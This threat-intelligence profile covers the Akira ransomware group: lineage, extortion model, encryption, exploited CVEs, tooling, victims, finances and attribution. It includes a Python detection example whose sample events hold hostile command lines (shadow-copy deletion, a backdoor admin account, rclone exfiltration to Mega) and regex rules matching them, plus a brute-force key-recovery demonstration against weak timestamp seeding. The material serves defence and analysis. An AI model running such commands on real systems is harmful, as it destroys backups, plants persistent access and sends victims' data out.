Overview
Akira is a Russian-nexus ransomware operation that emerged in March 2023 as part of the post-Conti diaspora. Operating as a Ransomware-as-a-Service (RaaS) enterprise, the group employs double extortion: data is exfiltrated prior to encryption, creating two independent leverage points against victims. Within its first year, Akira claimed over 250 victims and extracted approximately $42 million in ransom payments. By late 2025, it had become the single most prolific ransomware strain by annual revenue.
The group is tracked across the threat intelligence community under multiple aliases. No infrastructure takedown, domain seizure, or law enforcement operation targeting Akira specifically has been publicly announced as of May 2026.
| Attribute | Detail |
|---|---|
| Tracking aliases | PUNK SPIDER (CrowdStrike), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), Howling Scorpius (Unit 42) |
| Lineage | Conti diaspora — shared heritage with Wizard Spider / Gold Ulrick (the parent Conti organization); not itself designated Wizard Spider |
| Operational model | Ransomware-as-a-Service; closed RaaS with central operator control |
| Extortion mechanic | Double extortion (encryption + data publication threat); also offers decryption and deletion as separate purchasable options |
| Assessed jurisdiction | Russia / post-Soviet region (CREDIBLE) |
| LE disruption status | None confirmed as of May 2026 |
Origin & Lineage
Akira was first observed in March 2023, with the earliest leak site discovery dated April 26, 2023. It is assessed as unrelated to a prior strain that used the same name and .akira extension in 2017. The group name is assessed as a likely allusion to the 1988 Japanese animated film of the same name (ANALYST INFERENCE; no authoritative confirmation).
Akira emerged within the window in which former Conti affiliates were regrouping into new operations after Conti's May 2022 public dissolution. The timing aligns with the documented dispersal of Conti personnel into successor operations including Black Basta (April 2022), BlackByte, Karakurt, Royal/BlackSuit, and Akira.
TRM Labs assesses Akira's developers are located in Russia or the broader post-Soviet region, citing non-VPN IP observations tied to Russia and Russian-language operator communications on dark web forums. S-RM Intelligence corroborates this assessment. The Canadian Centre for Cyber Security assessed Akira as "very likely connected" to former Conti personnel. No founding member or leadership identity has been publicly confirmed.
Attribution to former Conti / Wizard Spider personnel rests on several independent lines of evidence, summarized under Attribution & Nexus below (Russian-language operator communications, non-VPN IP observations tied to Russia, wallet overlaps with Conti-affiliated addresses, and the organizational continuity described in the Zolotarjovs prosecution). Wizard Spider is CrowdStrike's tracking designation for the Russia-based eCrime group that operated TrickBot, Ryuk, and Conti as sequential campaigns; Secureworks tracks the same core cluster as Gold Ulrick. Neither designation has been extended to Akira or any specific Conti successor group: they describe shared heritage, not operational identity.
Akira's own vendor-specific tracking designations are: PUNK SPIDER (CrowdStrike, first flagged April 2023, defined as the Big Game Hunting adversary responsible for developing and maintaining Akira ransomware), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), and Howling Scorpius (Palo Alto Unit 42).
The Royal/BlackSuit branch is tracked separately by CrowdStrike as ROYAL SPIDER, confirming organizational separation between the two major post-Conti successor streams. Secureworks maintains a parallel separation: GOLD SAHARA covers Akira while a distinct designation covers the Royal/BlackSuit lineage. The practical implication: Wizard Spider and Gold Ulrick are correct as shared heritage designators for the parent organization, but the operational aliases for Akira itself are exclusively PUNK SPIDER, GOLD SAHARA, Storm-1567, and Howling Scorpius.
Operational Model
Akira operates as a closed RaaS enterprise (Unit 42 characterization). The affiliate revenue split is not publicly confirmed; Blackpoint Cyber assesses an 80/20 split (80% affiliate, 20% operator) consistent with the modern RaaS standard. S-RM Intelligence notes that Akira maintains control over ransom demands and the discounts affiliates can offer, indicating operator-side leverage even when affiliates conduct individual attacks. The affiliate pool is heterogeneous: S-RM observed "considerable variation in tooling and methodologies among different Akira affiliates."
TRM Labs' on-chain analysis confirms that early payment flows (2023) can be grouped by likely affiliate based on consistent wallet behaviors, providing the clearest structural evidence of the affiliate layer.
Akira employs a sequential extortion model:
- Exfiltration first: Data is exfiltrated prior to encryption. In some 2025 incidents, exfiltration completed within two hours of initial access.
- Encryption extortion: Victims must pay for decryption keys to restore systems.
- Publication threat: Victims must pay separately to prevent data publication on Akira's Tor-based Dedicated Leak Site (DLS).
- Disaggregated payment option: Akira offers victims the ability to pay for decryption or data deletion separately, lowering the payment threshold for victims with functional backups.
Beginning in early 2024, Akira temporarily abandoned encryption entirely, focusing on exfiltration-only extortion — assessed by Cisco Talos as reflecting developer retooling time for a new encryptor. Full double extortion resumed by mid-to-late 2024.
Negotiation is conducted through a Tor-based portal accessed with a unique ID from the ransom note. Ransomware.live has archived 61 negotiation chat logs spanning May 2023 through April 2025. Patterns observed across those logs:
- Negotiations begin promptly, often within hours of encryption deployment
- Operators demonstrate familiarity with victim financials (revenue, insurance coverage)
- Ransom demands are set opportunistically based on victim profile
- Publication threat escalates during stalled negotiations
Technical Profile
| Variant | Language | Extension | Period | Notes |
|---|---|---|---|---|
| Akira v1 | C++ | .akira | Mar–Jul 2023 | Initial release; Avast decryptor released Jun 2023 |
| Akira v1 (patched) | C++ | .akira | Jul 2023+ | Fixed decryption flaw; ransom note: akira_readme.txt |
| Megazord | Rust | .powerranges | Aug 2023+ | Rust-based; deployed alongside C++ variants |
| Akira v2 | Rust | .akira / .aki | 2023–2024 | Additional Rust variant; multiple extension variants |
| Akira (C++ return) | C++ | .akira | Sep 2024+ | Talos: reversion to C++ after retooling period |
Hybrid encryption: ChaCha20 stream cipher for file content, RSA-4096 to protect the ChaCha20 keys. The symmetric cipher gives speed; the asymmetric wrap means recovery requires the operator-held private key rather than brute force. Volume Shadow Copies (VSS) are deleted via PowerShell/WMI to prevent local recovery. Hypervisor targeting:
- VMware ESXi (April 2023+): Linux variant uses esxcli and vim-cmd to gracefully shut down VMs before encrypting virtual disk files.
- Nutanix AHV (June 2025): First documented attack against Nutanix hypervisor environments. Directly encrypts .qcow2 files without native management commands.
- Microsoft Hyper-V: Also targeted per updated CISA advisory.
| Vector | Notes |
|---|---|
| VPN exploitation without MFA | Dominant vector. Brute force, credential stuffing, or IAB purchase. |
| CVE exploitation | Primarily Cisco ASA/FTD and SonicWall. See CVE table below. |
| Remote Desktop Protocol (RDP) | Stolen or brute-forced credentials |
| Spear phishing | Credential harvesting |
| SSH exploitation | Router IP tunneling |
| Valid credentials (IAB purchase) | ~19.5% of Akira victims had credentials exposed through infostealer infections traded on credential markets |
| CVE | Product | CVSS | Type |
|---|---|---|---|
| CVE-2020-3259 | Cisco ASA/FTD | 7.5 | Information disclosure |
| CVE-2023-20269 | Cisco ASA/FTD | N/A | Authentication bypass |
| CVE-2024-40766 | SonicWall SonicOS SSL-VPN | 9.3 | Improper access control |
| CVE-2024-37085 | VMware ESXi | N/A | Authentication bypass |
| CVE-2023-27532 | Veeam Backup and Replication | N/A | Missing authentication |
| CVE-2024-40711 | Veeam Backup and Replication | N/A | Deserialization |
| CVE-2023-28252 | Windows CLFS | N/A | Privilege escalation |
| CVE-2022-40684 | Fortinet FortiOS | N/A | Authentication bypass |
| Phase | Tools |
|---|---|
| Discovery | Advanced IP Scanner, BloodHound, Masscan, SharpHound, AdFind, SoftPerfect NetScan |
| Credential Access | Mimikatz, LaZagne, Rubeus, SharpDomainSpray (Kerberoasting, LSASS dump) |
| Persistence | Local/domain account creation (e.g., itadm), added to administrator group |
| Lateral Movement | RDP, SSH, MobaXterm, Impacket (wmiexec.py), CrackMapExec, NetExec |
| C2 / Remote Access | AnyDesk, TeamViewer, MeshAgent, RustDesk, ScreenConnect; Ngrok/Cloudflared for tunneling |
| Defense Evasion | PowerTool (Zemana driver abuse), EDR uninstall, POORTRY/BurntCigar BYOVD, log clearing |
| Exfiltration | FileZilla, WinSCP, RClone (to Mega), WinRAR, Temp.sh |
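The tooling above gives a defender concrete command-line shapes to alert on. As an added example (not from the advisory or from the page's sources), the following Python runs a small rule set over constructed Sysmon-style process-creation events: the WMI shadow-copy deletion described under the technical profile, `net user` / `net localgroup` account creation of the kind noted under Persistence, `vssadmin` shadow deletion, and RClone copies to a cloud remote such as Mega. It then escalates any host that trips rules from more than one stage of the chain. The host names, users, the `itadm` password and the rule names are constructed; the command patterns are the generic Windows forms of the behaviours named in the table.

```python
"""Command-line detection rules for the post-access tooling above (added example)."""
import re
from collections import defaultdict

# Constructed events in a Sysmon Event ID 1 shape; not from a real incident.
SAMPLE_EVENTS = [
    {"host": "srv-fs01", "user": "CORP\\itadm",
     "cmdline": 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'},
    {"host": "srv-fs01", "user": "CORP\\svc_backup",
     "cmdline": "net user itadm Summer2025! /add"},
    {"host": "srv-fs01", "user": "CORP\\svc_backup",
     "cmdline": "net localgroup administrators itadm /add"},
    {"host": "wks-042", "user": "CORP\\jdoe",
     "cmdline": "rclone.exe copy D:\\Finance mega:dump --transfers 16"},
    {"host": "wks-042", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},   # benign admin activity
    {"host": "srv-db02", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
]

# (rule name, kill-chain stage, regex over the command line); names are ours, not a vendor's.
RULES = [
    ("vss_delete_wmi", "impact",
     r"(Win32_Shadowcopy.*Remove-WmiObject|\bwmic(\.exe)?\s+shadowcopy\s+delete)"),
    ("vss_delete_vssadmin", "impact",
     r"\bvssadmin(\.exe)?\s+delete\s+shadows"),
    ("account_create", "persistence",
     r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("local_admin_add", "persistence",
     r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("rclone_cloud_copy", "exfiltration",
     r"\brclone(\.exe)?\s+(copy|sync|move|copyto|moveto)\b.*\s(mega|s3|b2|sftp|ftp|gdrive|dropbox)[^\s:]*:"),
]
_COMPILED = [(name, stage, re.compile(pat, re.IGNORECASE)) for name, stage, pat in RULES]


def evaluate(events):
    """Return one alert dict per (event, rule) match."""
    alerts = []
    for ev in events:
        for name, stage, rx in _COMPILED:
            if rx.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "user": ev["user"], "rule": name,
                               "stage": stage, "cmdline": ev["cmdline"]})
    return alerts


def hosts_with_multiple_stages(alerts):
    """Escalation: a host that trips rules from two or more distinct stages
    (e.g. persistence plus impact) looks like an intrusion chain rather than a
    one-off administrative action."""
    stages = defaultdict(set)
    for a in alerts:
        stages[a["host"]].add(a["stage"])
    return {host for host, seen in stages.items() if len(seen) >= 2}


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for a in found:
        print(f'{a["host"]:9} {a["stage"]:12} {a["rule"]:20} {a["cmdline"]}')
    print("escalate:", sorted(hosts_with_multiple_stages(found)))
```

The benign `Get-ChildItem` line produces no alert, and only `srv-fs01` is escalated because it shows both persistence and impact activity; `wks-042` (exfiltration only) and `srv-db02` (shadow deletion only) stay as single-rule alerts. In production the same rules belong in the SIEM's own query language, with the stage correlation keyed on a time window rather than the whole event set.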
Targeting
| Sector | Victim Count | Notes |
|---|---|---|
| Manufacturing | 352 | Largest single sector |
| Business Services | 313 | |
| Construction | 132 | |
| Technology | 129 | |
| Consumer Services | 96 | |
| Healthcare, Finance, Education, Legal | Significant | No formal sector exclusions documented |
Dragos linked Akira to 83 industrial-sector incidents in Q1 2025 alone, approximately 12% of all tracked industrial ransomware activity that quarter. The November 2025 CISA advisory documented Akira attacks on 34 financial organizations between April 2024 and April 2025. FinCEN identified Akira as the most-reported ransomware variant in Bank Secrecy Act filings for the 2022–2024 review period.
| Country | Victim Count | % of Total |
|---|---|---|
| United States | 830 | 55.6% |
| Canada | 77 | 5.2% |
| Germany | 67 | 4.5% |
| United Kingdom | 38 | 2.5% |
| Italy | 34 | 2.3% |
| Other (66 countries) | 446 | 29.9% |
No CIS-region victims documented in any open-source database. Country data from internal records (Q3 2025+) confirms US dominance with additional payments confirmed from Spain, Canada, Ireland, United Kingdom, and Australia.
Primary profile: small-to-medium enterprises (SMEs). S-RM Intelligence documented that 86% of Akira victims have fewer than 1,000 employees.
Selection model: Primarily opportunistic, driven by available initial access (VPN exposure) rather than deliberate sector pre-selection. However, affiliates are assessed to exercise judgment in prioritizing targets with critical data dependencies, cyber insurance, and high operational disruption sensitivity.
Victim Data
| Period | Approx. Victims | Confidence |
|---|---|---|
| Q2–Q4 2023 | ~250 (partial year) | ANALYST INFERENCE for quarterly; CONFIRMED annual |
| 2024 (full year) | ~430 | CREDIBLE (FBI advisory reference) |
| Jan 1–Dec 11, 2025 | ~980 | CONFIRMED (TRM Labs) |
| Q1 2026 | ~150+ | CREDIBLE; 84 in March alone (second most active month on record) |
| Victim | Sector | Date | Notes |
|---|---|---|---|
| Stanford University | Education | Sep 2023 | 27,000 individuals notified |
| Nissan Australia | Automotive | Jan 2024 | 100,000 customers' data compromised |
| Tietoevry (Finland) | IT Services | Jan 2024 | Major Finnish IT provider; disrupted multiple Swedish client systems |
| Lush Cosmetics (UK) | Retail | 2023 | Confirmed victim |
| Toronto Zoo | Public Institution | Jan 2024 | Canadian critical infrastructure |
| Stoli Group | Food and Beverage | 2024 | Evidence of strategic coordination (Halcyon) |
Financial Profile
| Source | Period | Amount | Confidence |
|---|---|---|---|
| FBI/CISA Joint Advisory (Apr 2024) | By Jan 2024 | $42M | Confirmed |
| FinCEN Financial Trend Analysis (Dec 2025) | Apr 2023–Dec 2024 | $120.9M (376 BSA filings) | Confirmed |
| FBI/CISA Updated Advisory (Nov 2025) | Through Sep 2025 | $244.17M | Confirmed |
| TRM Labs Intel Library | 2025 full year | $150M | Confirmed |
Akira was identified as the most prolific ransomware strain by total ransom proceeds in 2025, collecting $150M, nearly twice the proceeds of the next-highest strain. FinCEN named Akira the most-reported variant in BSA data for the 2022–2024 review period.
Published demand range (open source): $200,000 to over $4 million USD. Demands set opportunistically based on victim financial profile, insurance coverage, and assessed data value.
Attribution & Nexus
Evidence basis: Russian-language operator communications on dark web forums; non-VPN IP observations tied to Russia; wallet infrastructure overlapping with Conti-affiliated addresses tied to formally sanctioned Russia-based operators. No contradicting evidence in open source.
The Akira binary does not contain the keyboard-layout check, common to most Russian-linked ransomware families, that halts execution on systems with a Russian or other CIS layout installed. Despite the absence of that technical safeguard, no CIS-region victims appear in any open-source database.
One confirmed arrest is tied to the Conti organizational entity that operated Akira:
| Attribute | Detail |
|---|---|
| Individual | Deniss Zolotarjovs, 35, Latvian national residing in Moscow |
| Arrest | Georgia (country), December 2023 |
| Transfer | U.S. custody, August 2024 |
| Outcome | Pleaded guilty July 2025; sentenced 102 months (8.5 years), May 3, 2026 |
| Role | Ransom negotiation escalator; weaponized sensitive personal data (including children's health records) to pressure non-paying victims |
| Scope | June 2021–August 2023; 54+ companies; $56M+ documented losses across 13 confirmed victims |
| Critical nuance | Involvement predates Akira's March 2023 standalone emergence. Prosecution covers organizational continuity between the Conti-led parent entity and Akira as a successor brand — not Akira-specific post-2023 activity. |
DOJ sentencing documents explicitly name Akira as one of the brands used by a Conti-led organization whose members "included multiple former Russian law enforcement officers" who "co-opted Russian government databases and law enforcement connections." The organization also paid bribes to exempt members from military conscription and maintained a structured presence in St. Petersburg.
No publicly confirmed direct tasking or control relationship between Akira's operators and Russian state intelligence services (FSB, SVR, or GRU) exists as of May 2026. However, the post-Conti/Wizard Spider ecosystem has documented intelligence-adjacent relationships:
- Recorded Future Dark Covenant 3.0 (October 2025): Leaked Conti communications show senior Conti figures provided data to both GRU and SVR. One operator ("Professor") maintained a paid informant or bribery relationship with SVR contacts.
- Vitalii Kovalev (Conti alias: Stern/Bentley): Assessed by German BKA and confirmed via leaked Qakbot developer chats as "linked to the FSB."
- DOJ sentencing documents (Zolotarjovs): Organization described as including "multiple former Russian law enforcement officers" who "co-opted Russian government databases."
Disruption History & Known Vulnerabilities
The only confirmed technical disruption action: Avast released a free decryptor on June 29, 2023 targeting the original C++ Windows variant. Akira patched the encryption flaw within days (July 2, 2023), demonstrating active development capacity. A Rust-based Megazord variant followed in August 2023. No publicly released decryptor exists for any subsequent Akira variant as of May 2026. A separate weakness in the Linux/ESXi variant's key generation was published in March 2025; it is a brute-force recovery method rather than a decryptor, and is summarized below:
| Attribute | Detail |
|---|---|
| Root cause | generate_random() calls get_current_time_nanosecond() as seed — insufficiently random. Passed through 1,500 rounds SHA-256 via Yarrow256 PRNG. |
| Attack method | Known-plaintext attack against VMware file headers (flat-VMDK, sesparse, NVRAM). ESXi timestamps constrain the search space. |
| Search space | ~4.5 quadrillion pairs — practical with GPU acceleration |
| Practical cost | 16 x RTX 4090 GPUs (cloud-rentable); ~10 hours recovery time; ~$261 per second-range searched |
| Status | Full source published to GitHub (March 2025). Patch status unconfirmed. |
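To make the table concrete: as an added example (not Akira's code and not the published recovery tool), the following Python models a key generator whose only entropy is a nanosecond clock read, then runs the known-plaintext search against a constructed VMDK-style header. Assumptions not on the page: the seed is the raw little-endian 64-bit nanosecond timestamp, key and nonce come from two separate clock reads a few nanoseconds apart (the "pairs" in the table), and the 1,500-round SHA-256 output is used directly as key material, omitting the Yarrow256 stage. ChaCha20 is implemented inline per RFC 8439 so the block has no third-party dependencies; the timestamps, the search window and all header bytes after the `KDMV` magic are made up.

```python
"""Known-plaintext recovery against a timestamp-seeded key generator (added example)."""
import hashlib
import struct

HASH_ROUNDS = 1500            # rounds of SHA-256 over the seed, the figure from the table
VMDK_SPARSE_MAGIC = b"KDMV"   # first four bytes of a VMDK sparse-extent header


def derive_key_material(seed_ns):
    """32 bytes derived from a nanosecond timestamp.
    Assumption: the seed is the raw little-endian 64-bit nanosecond count and the
    iterated digest is used directly (the Yarrow256 stage named on the page is omitted)."""
    h = struct.pack("<Q", seed_ns)
    for _ in range(HASH_ROUNDS):
        h = hashlib.sha256(h).digest()
    return h


# Minimal ChaCha20 (RFC 8439) so the example runs without third-party packages.
def _rotl32(v, n):
    return ((v << n) & 0xFFFFFFFF) | (v >> (32 - n))


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 7)


def _chacha20_block(key, counter, nonce):
    state = list(struct.unpack("<4I", b"expand 32-byte k"))
    state += struct.unpack("<8I", key)
    state += [counter] + list(struct.unpack("<3I", nonce))
    w = state[:]
    for _ in range(10):  # 20 rounds: 10 column + diagonal double rounds
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(w[i] + state[i]) & 0xFFFFFFFF for i in range(16)])


def chacha20_xor(key, nonce, data, counter=1):
    """Stream-cipher XOR: the same call encrypts and decrypts."""
    out = bytearray()
    for off in range(0, len(data), 64):
        keystream = _chacha20_block(key, counter + off // 64, nonce)
        out += bytes(a ^ b for a, b in zip(data[off:off + 64], keystream))
    return bytes(out)


def encrypt_header(t_key_ns, t_nonce_ns, plaintext):
    """Encryptor side (modelled): key and nonce each come from a separate clock read."""
    key = derive_key_material(t_key_ns)
    nonce = derive_key_material(t_nonce_ns)[:12]
    return chacha20_xor(key, nonce, plaintext)


def recover_seeds(ct_header, known_header, t_lo, t_hi, max_gap_ns=16):
    """Attacker side: enumerate (t_key, t_nonce) pairs inside a window and test each
    against the known plaintext. The window comes from file metadata (the table's
    'ESXi timestamps constrain the search space'); max_gap_ns bounds how far apart
    the two clock reads can be. Returns the pair, or None if the window is wrong."""
    cache = {}

    def material(t):
        if t not in cache:
            cache[t] = derive_key_material(t)
        return cache[t]

    for t_key in range(t_lo, t_hi + 1):
        key = material(t_key)
        for gap in range(max_gap_ns + 1):
            nonce = material(t_key + gap)[:12]
            if chacha20_xor(key, nonce, ct_header) == known_header:
                return t_key, t_key + gap
    return None


def build_sample():
    """Constructed sample: a 16-byte header beginning with the VMDK magic (the other
    twelve bytes are made up), encrypted under seeds from a fictional timestamp."""
    known_header = VMDK_SPARSE_MAGIC + bytes.fromhex("010000000300000009000000")
    t_key = 1_748_736_000_123_456_789   # fictional nanosecond timestamp
    t_nonce = t_key + 7                 # second clock read, 7 ns later
    return encrypt_header(t_key, t_nonce, known_header), known_header, (t_key, t_nonce)


if __name__ == "__main__":
    ct, known, planted = build_sample()
    # A window of +/-100 ns around the metadata hint is searched in about a second;
    # the same loop over a full second of uncertainty is 10^9 times larger, hence the GPUs.
    print("recovered:", recover_seeds(ct, known, planted[0] - 100, planted[0] + 100))
    print("planted:  ", planted)
```

The point the loop makes is that the effective key space is the product of the timestamp uncertainty and the gap between the two clock reads, not 2^256: the 1,500 hash rounds only multiply the per-candidate cost, they add no entropy. Seeding from the OS CSPRNG (for instance `os.urandom`) would make the search meaningless, which is why the table records the weakness as a root cause in key generation rather than in ChaCha20 itself.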
Government advisories:
- April 18, 2024 (AA24-109A): FBI, CISA, Europol EC3, Netherlands NCSC-NL. Original advisory covering TTPs and IOCs through February 2024.
- November 13, 2025 (AA24-109A Rev.): FBI, CISA, DC3, HHS, Europol EC3, France OFAC (Office Anti-Cybercriminalité, not the U.S. Treasury office of the same acronym), Germany LKA-BW, Netherlands NCSC-NL. Added Nutanix AHV targeting and an expanded CVE list including SonicWall CVE-2024-40766.
Both advisories are informational products (TTP and IOC sharing, victim notification) rather than direct disruption. No infrastructure seizures or arrests resulted.
Akira has operated for over three years (March 2023 to May 2026) without a direct law enforcement disruption event, making it one of the most durable major ransomware operations in the post-Conti period. No WAIS-scoreable events on record. Identified exposure points:
- Geographic exposure: Zolotarjovs arrest in Georgia demonstrates that travel outside Russia to non-extradition-treaty countries is an exploitable exposure point.
- On-chain attribution: Centralized laundering infrastructure (Defiway, WanChain, HTX) creates durable attribution opportunities. TRM Labs has successfully grouped affiliate payment flows through wallet cluster analysis and identified the primary cash-out exchange.
- Affiliate trust fragmentation: Recorded Future documented increasing affiliate disputes across the RaaS ecosystem post-Operation Endgame, including non-payment scams — a pattern affecting Akira's peer groups and a potential OPSEC exposure vector.
Status & Trajectory
All trajectory indicators are uniformly expansionary: volume rising, revenue rising, geographic expansion continuing, capability expanding (Nutanix AHV added June 2025, kill chain accelerating to sub-4 hours per Halcyon April 2026), and laundering sophistication increasing through four phase rotations in three years.
The absence of any law enforcement disruption event combined with rising revenue and victim volume suggests Akira has established a durable operational posture. The broader TRM-identified cluster (Fog, Frag, Anubis sharing laundering infrastructure) suggests Akira may function as an operational hub anchoring a wider affiliate ecosystem — consistent with a mature RaaS structure where high-trust affiliates work across multiple brands simultaneously.